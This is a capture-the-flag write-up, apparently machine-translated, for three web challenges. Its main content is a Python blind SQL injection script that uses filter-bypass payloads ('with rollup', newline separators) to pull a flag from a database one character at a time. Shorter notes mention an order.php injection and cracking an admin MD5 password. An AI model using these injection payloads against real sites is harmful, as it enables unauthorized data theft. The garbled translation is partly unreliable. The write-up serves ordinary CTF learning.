RedHat Web writeup
1, Thinkseeker
2, Phpmywind
3. Backstage
RedHat Web Writeup1, Thinkseeker
Two points in the exam
1, with rollup over the front two if
2. Find the flag with a blind note
About the 1th in the experiment it has the original title: http://www.shiyanbar.com/ctf/1940
The filtering method is slightly different, using the operator instead of the keyword. Tokens can be overridden with variables.
The 2nd is infoid this parameter has the blind note, the running script can get the flag.
Here is the script:
# -*- coding:utf-8 -*-
import requests
string = ‘‘
for i in range(1,63):
for j in range(32,127):
url="http://106.75.117.4:3083/?token=21232f297a57a5a743894a0e4a801fc3&infoid=1%0a%26%26%0aascii(substr((select%0agroup_concat(flag)%0afrom%0aflag)from({})for(1)))={}&userid=1%0a||%0a1%0agroup%0aby%0apassword%0awith%0arollup%0alimit%0a1%0aoffset%0a1&password=".format(i,j)
s=requests.get(url=url)
content=s.content
print i,j
# 判断
if "error sql!" not in content:
string+=chr(j)
break
print string
Final Answer:
or SQL injection to do less, a lot of statements will not be written.
2, Phpmywind
This problem is too many loopholes, casually swept out of 3 XSS, I was persistent think is the topic of XSS, once thought it was their own XSS platform problem, in fact, is order.php below an injection, reference article http://0day5.com/archives/1442/
Note Set cookies to prevent jumps
After unlocking MD5, log in to the administrator and find this
Visit to get flag
3. Backstage
Brain hole, the password is the date 20170506
In fact, there is a flag.php in the root directory, I thought it was to read this file,
Redhat Web writeup